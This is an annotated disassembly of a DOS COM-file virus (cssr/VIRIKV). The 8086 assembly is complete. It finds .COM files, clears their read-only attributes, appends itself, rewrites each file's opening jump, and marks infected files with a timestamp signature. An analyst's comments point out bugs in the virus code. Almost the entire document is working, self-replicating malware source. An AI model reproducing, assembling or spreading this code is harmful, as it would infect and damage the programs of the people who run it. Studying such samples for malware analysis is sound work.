page ,132 ; ; name: cssr.vom ; ; program type: com/bin ; ; cpu type: 8086/8087 ; ; program loaded at 0000:0100 ; ; physical eof at 0000:0518 ; ; program entry point at 0000:0100 ; fun segment assume cs:fun,ds:fun,es:fun,ss:fun ; ; start of program ; org 0100h h_0100: jmp h_0308 ;goto virus h_0103 db 0007h dup (90h) ;0103 . db 0eh,1fh,0b4h,09h,0bah,18h,0cdh,21h ;010a .......! db 0b8h,4ch,0cdh ;0112 .L. db "!Hello Ikv11 ! *****************" db "********************************" db "********************************" db "*****************************" h_0192 db "********************************" db "********************************" db "********************************" db "******************************" h_0210 db "********************************" db "********************************" db "********************************" db "********************************" db "********************************" db "********************************" db "********************************" db "**********************$" db 1ah ;0307 . h_0308: push ds ;save PSP seg xor ax,ax ;get a 0 push ax ;to stack h_030d equ $+1 ;varptr mov si,offset h_049a ;si = varptr mov dx,si ;get varptr add dx,+4ah ;up to name in old DTA (h_04e4) mov ax,3d00h ;fn = open for for read-only int 21h ;call DOS jae h_031e ;OK, continue jmp short h_0356 ;else skip processing db 90h ;nop probably due to masm h_031e: mov bx,ax ;handle to bx mov ah,3fh ;fn = read file mov cx,0003h ;size of starting JMP mov dx,si ;get vrptr add dx,+7fh ;up to diskbuf (h_0519) nop ;poor programming int 21h ;call DOS jae h_0332 ;OK, continue jmp short h_0356 ;else skip processing db 90h ;nop probably due to masm h_0332: cmp ax,0003h ;all bytes read? jnz h_0356 ;no, skip processing mov bx,si ;get varptr ;BUG: Handle destroyed! add si,+7fh ;up to diskbuf (h_0519) nop ;poor programming mov di,0100h ;start of COM file cld ;up! repz cmpsb ;correct start? cmp cx,+00h ;check again! jz h_0356 ;yes, go on mov dx,bx ;get varptr add dx,+57h ;up to warn_msg (h_04f1) nop ;poor programming mov ah,09h ;fn = print string int 21h ;call DOS mov ah,01h ;fn = keyboard input int 21h ;call DOS h_0356: mov si,bx ;get varptr ;BUGS: 1) BX should be handle, so it can ; be closed! ; 2) BX is NOT varptr, unless this ; virus found the file and ; processed it! mov dx,si ;to dx, too add si,+00h ;up to saved_prog_start (h_049a) cld ;up! mov cx,0003h ;size of saved_prog_start mov di,0100h ;normal COM start repz movsb ;replace COM start mov di,dx ;get varptr mov dx,002ch ;ofs to local_dta (h_04c6) add dx,di ;plus varptr mov bx,dx ;to bx, too! mov ah,1ah ;fn = set DTA int 21h ;call DOS mov bp,0000h ;clear rootflag mov dx,di ;get varptr add dx,+07h ;up to wildcard_com (h_04a1) h_037b: mov cx,0003h ;attributes = HIDDEN, R/O mov ah,4eh ;fn = find first matching file int 21h ;call DOS jmp short h_0389 ;goto common code db 90h ;nop probably due to masm h_0385: mov ah,4fh ;fn = find next matching file int 21h ;call DOS h_0389: jae h_03a0 ;OK, continue cmp al,12h ;error = no more files? jz h_0392 ;yes, stick around jmp h_048d ;else we're done h_0392: cmp bp,-01h ;check rootflag jnz h_039a ;no, continue jmp h_048d ;else we're done h_039a: dec dx ;backup ptr to root_wildcom mov bp,0ffffh ;set rootflag jmp short h_037b ;and try again h_03a0: mov cl,[bx+16h] ;get time (low) from DTA and cl,1fh ;isolate seconds/2 cmp cl,02h ;signature seconds/2 jz h_0385 ;yes, try next file cmp word ptr [bx+1ah],0fa00h ;too big? (64000 dec) ja h_0385 ;yes, try next file cmp word ptr [bx+1ah],0100h ;too small? (256 dec) jnae h_0385 ;yes, try next file ;BUG: Need to check high word, too! push di ;save varptr mov si,bx ;get ptr to DTA add si,+1eh ;up to filename in DTA add di,+14h ;up to infect_name (h_04ae) cmp bp,-01h ;check root_flag jnz h_03ca ;not set, skip this mov al,5ch ;the leading '\' stosb ;put it in infect name h_03ca: lodsb ;get name byte from DTA stosb ;add to infect_name cmp al,00h ;at EOS? jnz h_03ca ;do, no next byte pop di ;restore varptr mov dx,di ;to dx, too add dx,+14h ;up to infect_name (h_04ae) mov ax,4300h ;fn = get file attributes int 21h ;call DOS ;NOTE: Why? They are in the DTA! mov [di+22h],cx ;save attributes (h_04bc) and cx,-02h ;turn off read-only mov dx,di ;get varptr add dx,+14h ;up to infect_name (h_04ae) mov ax,4301h ;fn = set file attributes int 21h ;call DOS mov dx,di ;get varptr add dx,+14h ;up to infect_name (h_04ae) mov ax,3d02h ;fn = open file for read/write int 21h ;call DOS jae h_03fa ;OK, continue jmp h_0485 ;else quit h_03fa: mov bx,ax ;handle to bx mov ax,5700h ;fn = get file time/date int 21h ;call DOS mov [di+24h],cx ;save file_time (h_04be) mov [di+26h],dx ;and file_date (h_04c0) ;NOTE: Why? They are in the DTA! mov ah,3fh ;fn = read file mov cx,0003h ;size of saved_prog_start mov dx,di ;get varptr add dx,+00h ;up to saved_prog_start (h_049a) int 21h ;call DOS jae h_0418 ;OK, continue jmp short h_0470 ;else we're done db 90h ;nop probably due to masm h_0418: cmp ax,0003h ;all bytes read? jnz h_0470 ;no, we're done mov ax,4202h ;fn = lseek to EOF+CX:DX mov cx,0000h ;cx:dx = 0 mov dx,cx int 21h ;call DOS sub ax,0003h ;size minus JMP size mov [di+04h],ax ;save virus_jmp_ofs (h_049e) mov cx,offset h_049a-h_0308 ;ofs to varptr (0192h) cmp dx,+00h ;file > 64K? jnz h_0470 ;yes, we're done mov dx,di ;get varptr sub di,cx ;back to start of virus add di,+05h ;up to varptr in memory add ax,0103h ;JMP ofs + JMP size + PSP size add ax,cx ;plus ofs to start of vars mov [di],ax ;set varptr for next inf(h_030d) mov ah,40h ;fn = write to file mov di,dx ;get varptr sub dx,cx ;back to start of virus mov cx,offset h_0518-h_0308 ;virus size (0210h) int 21h ;call DOS jae h_0453 ;OK, continue jmp short h_0470 ;else we're done db 90h ;nop probably due to masm h_0453: cmp ax,offset h_0518-h_0308 ;all bytes written? (0210h) jnz h_0470 ;no, we're done mov ax,4200h ;fn = lseek to BOF+CX:DX mov cx,0000h ;cx:dx = 0 mov dx,cx int 21h ;call DOS jnae h_0470 ;error, quit mov ah,40h ;fn = write to file mov cx,0003h ;size of virus_jmp mov dx,di ;get varptr add dx,+03h ;up to virus_jmp (h_049d) int 21h ;call DOS h_0470: mov cx,[di+24h] ;get file_time mov dx,[di+26h] ;and file_date and cx,-20h ;turn off seconds/2 or cl,02h ;set signature seconds/2 mov ax,5701h ;fn = set file time/date int 21h ;call DOS mov ah,3eh ;fn = close file int 21h ;call DOS h_0485: mov ax,4301h ;fn = set file attributes mov cx,[di+16h] ;get attributes (h_04b0) ;BUG: Needs ds:dx = filename to set attributes! int 21h ;call DOS h_048d: mov dx,0080h ;ds:dx = default DTA mov ah,1ah ;fn = set DTA int 21h ;call DOS pop ax ;get 0 (fake drive validity) mov di,0100h ;normal COM start push di ;to stack ret ;run infected program ; h_049a db 90h,90h,90h ;saved_prog_start h_049d db 0e9h ;virus_jmp h_049e dw 0205h ;virus_jmp_ofs h_04a0 db "\" ;root_wildcom h_04a1 db "????????.COM" ;wildcard_com ; db 5ch,3fh,3fh,3fh,3fh,3fh,3fh,3fh ;04a0 ; db 3fh,2eh,43h,4fh,4dh ;04a8 db 00h ;04ad h_04ae db "VIRIKV.COM" ;infect_name ; db 56h,49h,52h,49h,4bh,56h,2eh,43h ;04ae ; db 4fh,4dh ;04b6 db 00h ;04b8 db 4dh,00h,00h ;04b9 M.. h_04bc dw 0020h ;attributes h_04be dw 0befbh ;file_time h_04c0 dw 152eh ;file_date ; db 00h,00h,00h,00h ;04c2 .... ; ; local_dta ; h_04c6 db 01h ;04c6 . db "????????COM" ; db 3fh,3fh,3fh,3fh,3fh,3fh,3fh,3fh ;04c7 ; db 43h,4fh,4dh ;04cf db 03h,0bh,00h,00h,00h,00h,00h,00h ;04d2 ........ db 00h,20h,0fbh,0beh,2eh,15h,08h,02h ;04da . ...... db 00h,00h ;04e2 .. h_04e4 db "VIRIKV.COM" ;name in DTA ; db 56h,49h,52h,49h,4bh,56h,2eh,43h ;04e4 ; db 4fh,4dh ;04ec db 00h ;04ee db 4dh,00h ;04ef M. h_04f1 db 0dh ;warn_msg db "Warning : File is damaged by virus !!!" ;BUG: They forgot the '$' ; string terminator! ; h_0518 equ $ ;end of file h_0519 equ $+1 ;diskbuf fun ends end h_0100